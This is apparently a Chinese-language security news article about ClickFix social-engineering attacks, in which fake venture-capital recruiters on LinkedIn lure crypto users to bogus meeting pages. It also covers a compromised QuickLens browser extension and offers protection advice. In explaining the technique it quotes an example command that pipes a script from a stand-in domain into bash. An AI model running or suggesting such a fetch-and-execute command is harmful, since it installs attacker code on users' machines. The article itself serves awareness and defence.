ClickFix 攻击以 VC 伪装重击加密黑客
目录
根据 Moonlock Lab 的报告,加密黑客通过 ClickFix 攻击伪装成风险投资公司来针对用户。通过假冒的 SolidBit、MegaBit 和 Lumax Capital 等公司,从 LinkedIn 发送合作提议,然后引导至假的 Zoom 和 Google Meet 链接。点击目标链接时,会出现假的 Cloudflare “我不是机器人”复选框;点击后,恶意命令被复制到剪贴板,并要求用户粘贴到终端并运行。通过这种方法,黑客绕过了安全措施;名为 Mykhailo Hureiev 的账户被介绍为 SolidBit 的创始合伙人,扮演主要角色,但基础设施身份迅速变更。
一名名为 Mykhailo Hureiev 的用户据称是诈骗初始 LinkedIn 阶段的主要联系人。来源:big dan
ClickFix 攻击的技术机制
ClickFix 使用剪贴板投毒技术。当点击假 CAPTCHA 时,剪贴板上复制如 ‘curl -s https://fake-domain.sh | bash’ 之类的命令。用户为了“解决问题”而将其粘贴到终端并运行。这绕过了类似 UAC 的保护,因为代码是由用户自愿运行的。根据 Microsoft Threat Intelligence,从去年以来,在生产、零售和政府部门报告了 100 多个案例。
假 LinkedIn 账户和 Mykhailo Hureiev 的角色
Mykhailo Hureiev 账户作为 SolidBit 创始合伙人发送假提议。黑客在几分钟内更改 IP 和域名,使追踪困难。LinkedIn 的验证缺失使加密专业人士成为理想目标。类似策略导致如 SEED 详细分析 等资产的 seed phrase 被盗。
QuickLens Chrome 扩展黑客细节
同一时期 QuickLens 扩展被攻陷。根据 Annex Security 报告,7.000 名用户受影响:加密钱包数据、seed phrase、Gmail 密码被盗。扩展通过 ClickFix 传播恶意软件,并从 Chrome Web Store 下架。
QuickLens 在被入侵用于推送恶意软件后从网络商店移除。来源:Annex Security
ClickFix 的行业影响表格
| 行业 | 报告使用 | 来源 |
|---|---|---|
| 制造业 | 普遍 | Unit42 |
| 零售 | 中等 | Microsoft TI |
| 政府 | 低 | Unit42 |
| 加密货币 | 上升 | Moonlock Lab |
SEED 投资者 ClickFix 风险分析
在像 SEED 这样的币中,seed phrase 被盗会导致资金完全丢失。攻击者伪装成 VC 猎捕 SEED 期货 投资者。防护:启用 2FA,将 seed 转移到硬件钱包,验证 LinkedIn 提议,并使用剪贴板监控工具(例如 CleanClip)。
类似攻击防护策略
- 不要点击假链接;始终检查官方域名。
- 不要运行未阅读的终端命令。
- 仅从官方商店安装扩展并限制权限。
- 在加密社区采用验证协议。